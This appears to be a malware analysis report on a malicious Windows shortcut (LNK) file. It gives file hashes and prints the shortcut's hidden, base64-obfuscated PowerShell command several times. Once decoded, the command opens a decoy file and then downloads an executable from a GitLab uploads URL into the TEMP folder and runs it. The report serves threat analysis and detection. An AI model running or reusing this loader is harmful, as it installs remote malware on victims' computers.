|
Hash | Hash Value |
|---|---|
| MD5 | 64ff7bfcea29963681fa0017f3811983
|
| Sha1 | 2f138f18d57a8f5633b952ea5abd6074459bdae0
|
| Sha256 | 1ba43b5fc228be721cb57394e2d0999ddbbf34d0cb4c00998bce241eb41c546a
|
| Sha384 | 025f943765c6e7b96f26c83fa63fe5af81cc36ec05efd52f69ae28ff9e538b745860dc0b2c653c54d4b4007122f6580b
|
| Sha512 | 152fe0973515c8e61856cb4eed8c531e0ae3a3330d3ca3b6ccd671fd86e652fe3d92a68f1d88e05b8188cb43f6b14967160d3af3b2112d299b031f967f547056
|
| SSDeep | 1536:jafW6pTEZ43eXLsOqbDmm/JG/W0IstFBWIor:jeW6pTE+OZyDb/JG/iSFBWIor
|
| TLSH | DD53F11609A1836ED571CC71B9C526094A73F8AAEB31EB29484E66434FC3C3E351D73D
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle hidden -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle hidden -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" Malicious |
64ff7bfcea29963681fa0017f3811983 |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" Malicious |
64ff7bfcea29963681fa0017f3811983 > LNK CommandLine |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UGL9185A = 'gWe6HFvlgu4gfcfFm4dsTmBbjN1ZEJEWkdGYkI1RmRZQXprR2NEZDRTZXQtQ29udGVudCAkZW52OlRFTVBcTG9hZGluZy4uICdSZXZpZXcnO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXExvYWRpbmcuLjtpd3IgLVVyaSBodHRwczovL2dpdGxhYi5jb20vLS9wcm9qZWN0Lzc2ODM2MzkxL3VwbG9hZHMvMWY3MWM3OWVjNGI5YjA1NGY2ZDY4ZDM0YTZmNDMxMmQvb3N2MzIuZXhlIC1PdXRGaWxlICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxXOVo2R29zdjMyLmV4ZTtFeGl0';$XY2IYW3 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UGL9185A.Substring(23)));Invoke-Expression -Command $XY2IYW3.Substring(23);Exit" Malicious |
64ff7bfcea29963681fa0017f3811983 > LNK CommandLine > [Deobfuscated PS] |